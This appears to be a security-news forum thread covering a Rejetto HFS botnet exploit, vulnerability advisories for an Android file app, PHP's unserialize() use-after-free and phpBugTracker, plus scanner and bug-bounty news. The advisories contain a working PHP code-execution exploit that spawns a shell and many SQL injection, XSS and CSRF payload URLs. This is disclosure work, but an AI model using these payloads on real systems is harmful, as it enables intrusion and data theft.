  20. Apparently no vulnerability is too small, no application too obscure, to escape a hacker’s notice. A honeypot run by Trustwave’s SpiderLabs research team recently snared an automated attack targeting users of the open source Rejetto HTTP File Server (Rejetto HFS). Someone was trying to exploit a vulnerability—which has since been patched—and install the well-known distributed denial-of-service tool IptabLes (unrelated to the Linux tool), also known as IptabLex. Rejetto HFS has been downloaded more than 24,000 times in the last seven days and according to the project’s website has an estimated 12,500 users and is used as a file-sharing application as well as a webserver. It also runs on Wine, the Windows emulator for Linux systems. “This is just one snapshot, one request. This is one example to extrapolate and take a higher level view; there’s likely a lot more activity out there,” said Ryan Barnett, SpiderLabs lead researcher. It’s likely the attackers have simply incorporated this exploit into a larger attack platform, Barnett said. “That’s the value of honeypots, spotting automated tools scanning the Internet shot-gunning exploits, and hoping it works,” Barnett said. The exploit, sent from a possible compromised IP address in China, was targeting CVE-2014-6287, a remote code execution bug in Rejetto. Specifically, the vulnerability affects Rejetto versions prior to 2.3c; the vulnerability is in the findMacroMarker function. Barnett said the exploit relies on a null byte character to trigger the attack code, which is written in Microsoft VBScript. Once the exploit executes, it tries to connect to a pair of IP addresses hosted in Paris (123[.]108.109.100 and 178[.]33.196.164) on three ports: 80 (HTTP); 53 (DNS); and 443 (HTTPS). Barnett said only 178[.]33.196.164 remains online and is a malware repository responding to XML HTTP Requests (XHR) from the exploit. A file called getsetup.exe is sent to the compromised server along with another executable, ko.exe, which drops IptabLes. Barnett said detection rates are high for the hash of getsetup.exe. IptabLes is a troublesome DDoS tool, capable of synflood and DNSflood attacks. It installs itself into boot for persistence, according to the SpiderLabs research, which added that IptabLes has been widely reported targeting Linux and Unix servers. The vulnerability being targeted was submitted last September. “It’s not very sophisticated, and a lot of times these types of attacks don’t have to be,” Barnett said. “These guys are concerned with scale because they’re running botnets. What makes botnets so nice to the criminals running them is that they don’t care to be stealthy. They can send attacks blindly, and if they’re shut down, they just move on.” Source
  21. Document Title: =============== Wireless File Transfer Pro Android - CSRF Vulnerabilities References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1437 Release Date: ============= 2015-02-25 Vulnerability Laboratory ID (VL-ID): ==================================== 1437 Common Vulnerability Scoring System: ==================================== 2.3 Product & Service Introduction: =============================== Wireless File Transfer Pro is the advanced version of Wireless File Transfer. (Copy of the Vendor Homepage: https://play.google.com/store/apps/details?id=com.lextel.WirelessFileTransferPro ) Abstract Advisory Information: ============================== An independent vulnerability laboratory researcher discovered multiple cross site request forgery web vulnerabilities in the Wireless File Transfer Pro v1.0.1 mobile android application. Vulnerability Disclosure Timeline: ================================== 2015-02-25: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Lextel Technology Product: Wireless File Transfer Pro - (Android) Web Application UI 5.9.5 - 1.0.1 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ Multiple cross site request forgery issues has been discovered in the Wireless File Transfer Pro 1.0.1 android mobile web-application. The mobile web-application is vulnerable to a combination of cross site request forgery and local command injection attacks. Proof of Concept (PoC): ======================= The vulnerabilities can be exploited by remote attackers without privileged application user account and with medium user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. Create New Folder <img src="http://192.168.1.2:8888/fileExplorer.html?action=create&type=folder&folderName=test1" width="0" height="0" border="0"> --- PoC Session Logs [GET] (Execution) --- GET /fileExplorer.html?action=create&type=folder&folderName=test1 HTTP/1.1 Host: 192.168.1.2:8888 User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://192.168.1.2:8888/fileExplorer.html?action=brower&path=/sdcard Connection: keep-alive HTTP/1.1 200 OK Cache-control: no-cache Content-length: 4 <a href="#" onclick="actionBrower('/sdcard/test1')">test1</a></td></td><td width="24%"></td><td width="24%">2015-02-09 18:12:19</td><td width="15%"> Delete File, Folder <img src="http://192.168.1.2:8888/fileExplorer.html?action=deleteFile&fileName=test""width="0" height="0" border="0"> --- PoC Session Logs [GET] (Execution) --- GET /fileExplorer.html?action=deleteFile&fileName=test HTTP/1.1 Host: 192.168.1.2:8888 User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://192.168.1.2:8888/fileExplorer.html?action=brower&path=/sdcard Connection: keep-alive HTTP/1.1 200 OK Cache-control: no-cache Content-length: 30 Reference: http://localhost:8888/ Security Risk: ============== The security risk of the cross site request forgery web vulnerability in the create and delete function is estimated as medium. (CVSS 2.3) Credits & Authors: ================== Hadji Samir [s-dz@hotmail.fr] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt Source
  22. At last week’s Security Analyst Summit, HackerOne’s Katie Moussouris explains one of the key things that companies that want to start a bounty or vulnerability incentive program should know: There is no one size fits all. Source
  23. Use After Free Vulnerability in unserialize() with DateTime* [CVE-2015-0273] Taoguang Chen <[@chtg](http://github.com/chtg)> - Write Date: 2015.1.29 - Release Date: 2015.2.20 A use-after-free vulnerability was discovered in unserialize() with DateTime/DateTimeZone/DateInterval/DatePeriod objects's __wakeup() magic method that can be abused for leaking arbitrary memory blocks or execute arbitrary code remotely. Affected Versions ------------ Affected is PHP 5.6 < 5.6.6 Affected is PHP 5.5 < 5.5.22 Affected is PHP 5.4 < 5.4.38 Credits ------------ This vulnerability was disclosed by Taoguang Chen. Description ------------ static int php_date_initialize_from_hash(php_date_obj **dateobj, HashTable *myht) { zval *z_date; zval *z_timezone; zval *z_timezone_type; zval tmp_obj; timelib_tzinfo *tzi; php_timezone_obj *tzobj; z_date = zend_hash_str_find(myht, "date", sizeof("data")-1); if (z_date) { convert_to_string(z_date); z_timezone_type = zend_hash_str_find(myht, "timezone_type", sizeof("timezone_type")-1); if (z_timezone_type) { convert_to_long(z_timezone_type); z_timezone = zend_hash_str_find(myht, "timezone", sizeof("timezone")-1); if (z_timezone) { convert_to_string(z_timezone); ... static int php_date_timezone_initialize_from_hash(zval **return_value, php_timezone_obj **tzobj, HashTable *myht TSRMLS_DC) { zval **z_timezone = NULL; zval **z_timezone_type = NULL; if (zend_hash_find(myht, "timezone_type", 14, (void**) &z_timezone_type) == SUCCESS) { if (zend_hash_find(myht, "timezone", 9, (void**) &z_timezone) == SUCCESS) { convert_to_long(*z_timezone_type); if (SUCCESS == timezone_initialize(*tzobj, Z_STRVAL_PP(z_timezone) TSRMLS_CC)) { return SUCCESS; } } } return FAILURE; } The convert_to_long() leads to the ZVAL and all its children is freed from memory. However the unserialize() code will still allow to use R: or r: to set references to that already freed memory. There is a use after free vulnerability, and allows to execute arbitrary code. Proof of Concept Exploit ------------ The PoC works on standard MacOSX 10.10.2 installation of PHP 5.5.14. <?php $f = $argv[1]; $c = $argv[2]; $fakezval1 = ptr2str(0x100b83008); $fakezval1 .= ptr2str(0x8); $fakezval1 .= "\x00\x00\x00\x00"; $fakezval1 .= "\x06"; $fakezval1 .= "\x00"; $fakezval1 .= "\x00\x00"; $data1 = 'a:3:{i:0;O:12:"DateTimeZone":2:{s:13:"timezone_type";a:1:{i:0;i:1;}s:8:"timezone";s:3:"UTC";}i:1;s:'.strlen($fakezval1).':"'.$fakezval1.'";i:2;a:1:{i:0;R:4;}}'; $x = unserialize($data1); $y = $x[2]; // zend_eval_string()'s address $y[0][0] = "\x6d"; $y[0][1] = "\x1e"; $y[0][2] = "\x35"; $y[0][3] = "\x00"; $y[0][4] = "\x01"; $y[0][5] = "\x00"; $y[0][6] = "\x00"; $y[0][7] = "\x00"; $fakezval2 = ptr2str(0x3b296324286624); // $f($c); $fakezval2 .= ptr2str(0x100b83000); $fakezval2 .= "\x00\x00\x00\x00"; $fakezval2 .= "\x05"; $fakezval2 .= "\x00"; $fakezval2 .= "\x00\x00"; $data2 = 'a:3:{i:0;O:12:"DateTimeZone":2:{s:13:"timezone_type";a:1:{i:0;i:1;}s:8:"timezone";s:3:"UTC";}i:1;s:'.strlen($fakezval2).':"'.$fakezval2.'";i:2;O:12:"DateTimeZone":2:{s:13:"timezone_type";a:1:{i:0;R:4;}s:8:"timezone";s:3:"UTC";}}'; $z = unserialize($data2); function ptr2str($ptr) { $out = ""; for ($i=0; $i<8; $i++) { $out .= chr($ptr & 0xff); $ptr >>= 8; } return $out; } ?> Test the PoC on the command line, then any PHP code can be executed: $ lldb php (lldb) target create "php" Current executable set to 'php' (x86_64). (lldb) run uafpoc.php assert "system\('sh'\)==exit\(\)" Process 13472 launched: '/usr/bin/php' (x86_64) sh: no job control in this shell sh-3.2$ php -v PHP 5.5.14 (cli) (built: Sep 9 2014 19:09:25) Copyright (c) 1997-2014 The PHP Group Zend Engine v2.5.0, Copyright (c) 1998-2014 Zend Technologies sh-3.2$ exit exit Process 13472 exited with status = 0 (0x00000000) (lldb) Source
  24. Advisory: Multiple SQLi, stored/reflecting XSS- and CSRF-vulnerabilities in phpBugTracker v.1.6.0 Advisory ID: SROEADV-2015-16 Author: Steffen Rösemann Affected Software: phpBugTracker v.1.6.0 Vendor URL: https://github.com/a-v-k/phpBugTracker Vendor Status: patched CVE-ID: will asked to be assigned after release on FullDisclosure via OSS-list Tested on: OS X 10.10 with Firefox 35.0.1 ; Kali Linux 3.18, Iceweasel 31 ========================== Vulnerability Description: ========================== The Issuetracker phpBugTracker v. 1.6.0 suffers from multiple SQLi-, stored/reflected XSS- and CSRF-vulnerabilities. ================== Technical Details: ================== The following files used in a common phpBugTracker installation suffer from different SQLi-, stored/reflected XSS- and CSRF-vulnerabilities: =========== project.php =========== SQL injection / underlaying CSRF vulnerability in project.php via id parameter: http:// {TARGET}/admin/project.php?op=edit_component&id=1%27+and+1=2+union+select+1,2,database%28%29,user%28%29,5,6,version%28%29,8,9,10,11,12+--+ Stored XSS via input field "project name": http://{TARGET}/admin/project.php?op=add executed in: e.g. http://{TARGET}/admin/project.php, http:// {TARGET}/index.php ======== user.php ======== Reflecting XSS in user.php via use_js parameter: http:// {TARGET}/admin/user.php?op=edit&use_js=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&user_id=1 executed in: same page ========= group.php ========= Reflecting XSS in group.php via use_js parameter: http:// {TARGET}/admin/group.php?op=edit&use_js=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&group_id=1 executed in: same page (Blind) SQL Injection / underlaying CSRF vulnerability in group.php via group_id parameter (used in different operations): http:// {TARGET}/admin/group.php?op=edit&use_js=1&group_id=1+and+SLEEP%2810%29+--+ http:// {TARGET}/admin/group.php?op=edit-role&use_js=1&group_id=8+and+substring%28version%28%29,1,1%29=5+--+ ========== status.php ========== SQL injection / underlaying CSRF vulnerability in status.php via status_id parameter: http:// {TARGET}/admin/status.php?op=edit&status_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29,5+--+ Stored XSS via input field "Description": http://{TARGET}/admin/status.php?op=edit&use_js=1&status_id=0 executed in: e.g. http://{TARGET}/admin/status.php CSRF vulnerability in status.php (delete statuses): <img src="http://{TARGET}/admin/status.php?op=del&status_id={NUMERIC_STATUS_ID}" ============== resolution.php ============== SQL injection / underlaying CSRF vulnerability in resolution.php via resolution_id parameter: http:// {TARGET}/admin/resolution.php?op=edit&resolution_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29+--+ CSRF vulnerability in resolution.php (delete resolutions): <img src="http://{TARGET}/admin/resolution.php?op=del&resolution_id={NUMERIC_RESOLUTION_ID}" ============ severity.php ============ SQL injection / underlaying CSRF vulnerability in severity.php via severity_id parameter: http:// {TARGET}/admin/severity.php?op=edit&severity_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29,5+--+ CSRF vulnerability in severity.php (delete severities): <img src="http://{TARGET}/admin/severity.php?op=del&severity_id={NUMERIC_SEVERITY_ID}" Stored XSS in severity.php via input field "Description": http://{TARGET}/admin/severity.php?op=edit&use_js=1&severity_id=0 executed in: e.g. http://{TARGET}/admin/severity.php ============ priority.php ============ SQL injection / underlaying CSRF vulnerability in priority.php via priority_id parameter: http:// {TARGET}/admin/priority.php?op=edit&priority_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,4,version%28%29+--+ ====== os.php ====== SQL Injection / underlaying CSRF vulnerability in os.php via os_id parameter: http:// {TARGET}/admin/os.php?op=edit&os_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29+--+ CSRF vulnerability in os.php (delete operating systems): <img src="http://{TARGET}/admin/os.php?op=del&os_id={NUMERIC_OS_ID}" > Stored XSS vulnerability in os.php via input field "Regex": http://{TARGET}/admin/os.php?op=edit&use_js=1&os_id=0 executed in: e.g. http://{TARGET}/admin/os.php? ============ database.php ============ SQL injection / underlaying CSRF vulnerability in database.php via database_id: http:// {TARGET}/admin/database.php?op=edit&database_id=1%27+and+1=2+union+select+1,user%28%29,version%28%29+--+ CSRF vulnerability in database.php (delete databases): <img src="http://{TARGET}/admin/database.php?op=del&database_id={NUMERIC_DATABASE_ID}" Stored XSS vulnerability in database.php via input field "Name": http://{TARGET}/admin/database.php?op=edit&use_js=1&database_id=0 ======== site.php ======== CSRF vulnerability in site.php (delete sites): <img src="http://{TARGET}/admin/site.php?op=del&site_id={NUMERIC_SITE_ID}" > SQL injection / underlaying CSRF vulnerability in site.php via site_id parameter: http:// {TARGET}/admin/site.php?op=edit&site_id=5%27+and+1=2+union+select+1,version%28%29,database%28%29+--+ ======= bug.php ======= This issue has already been assigned CVE-2004-1519, but seems to have not been corrected since the assignment: SQL injection / underlaying CSRF vulnerability in bug.php via project parameter: http:// {TARGET}/bug.php?op=add&project=1%27+and+1=2+union+select+user%28%29+--+ For details see http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1519. ========= Solution: ========= Update to version 1.7.0. ==================== Disclosure Timeline: ==================== 03/05-Feb-2015 – found the vulnerabilities 05-Feb-2015 - informed the developers (see [3]) 05-Feb-2015 – release date of this security advisory [without technical details] 05-Feb-2015 - forked the Github repository, to keep it available for other security researchers (see [4]) 05/06-Feb-2015 - vendor replied, will provide a patch for the vulnerabilities 09-Feb-2015 - vendor provided a patch (version 1.7.0, see [3]); technical details will be released on 19th February 2015 19-Feb-2015 - release date of this security advisory 19-Feb-2015 - send to FullDisclosure ======== Credits: ======== Vulnerabilities found and advisory written by Steffen Rösemann. =========== References: =========== [1] https://github.com/a-v-k/phpBugTracker [2] http://sroesemann.blogspot.de/2015/02/sroeadv-2015-16.html [3] https://github.com/a-v-k/phpBugTracker/issues/4 [4] https://github.com/sroesemann/phpBugTracker Source
  25. Google on Thursday unleashed its own free web application vulnerability scanner tool, which the search engine giant calls Google Cloud Security Scanner, that will potentially scan developers' applications for common security vulnerabilities on its cloud platform more effectively. SCANNER ADDRESSES TWO MAJOR WEB VULNERABILITIES Google launched the Google Cloud Security Scanner in beta. The New web application vulnerability scanner allows App Engine developers to regularly scan their applications for two common web application vulnerabilities: Cross-Site Scripting (XSS) Mixed Content Scripts Despite several free web application vulnerability scanner and vulnerability assessment tools are available in the market, Google says these website vulnerability scanners are typically hard to set up and "built for security professionals," not for web application developers that run the apps on the Google App Engine. While Google Cloud Security Scanner will be easier for web application developers to use. This web application vulnerability scanner easily scans for Cross-Site Scripting (XSS) and mixed content scripts flaws, which the company argues are the most common security vulnerabilities Google App Engine developers face. Today, common HTML5 and JavaScript-heavy applications are more challenging to crawl and test, and Google Cloud Security Scanner claims to take a novel approach by parsing the code and then executing a full-page render to find more complex areas of a developer's site. GO FOR WEB VULNERABILITY SCAN NOW The developers can access the Cloud Security Scanner under Compute > App Engine > Security in Google's Developers Console. This will run your first scan. It does not work with App Engine Managed VMs, Google Compute Engine, or other resources. Google notes that there are two typical approaches to such security scans: Parse the HTML and emulate a browser – This is fast; however, it comes at the cost of missing site actions that require a full DOM or complex JavaScript operations. Use a real browser – This approach avoids the parser coverage gap and most closely simulates the site experience. However, it can be slow due to event firing, dynamic execution, and time needed for the DOM to settle. Security Engineering head Rob Mann says that their web vulnerability scanner uses Google Compute Engine to dynamically create a botnet of hundreds of virtual Chrome workers that scan at a max rate of 20 requests per second, so that the target sites won’t be overloaded. The search engine giant still recommended developers to look into manual security review by a web app security professional, just to be on the safer side. However, the company hopes its vulnerability scanner tool will definitely provide a simple solution to the most common App Engine issues with minimal false positives. Source
×
×
  • Create New...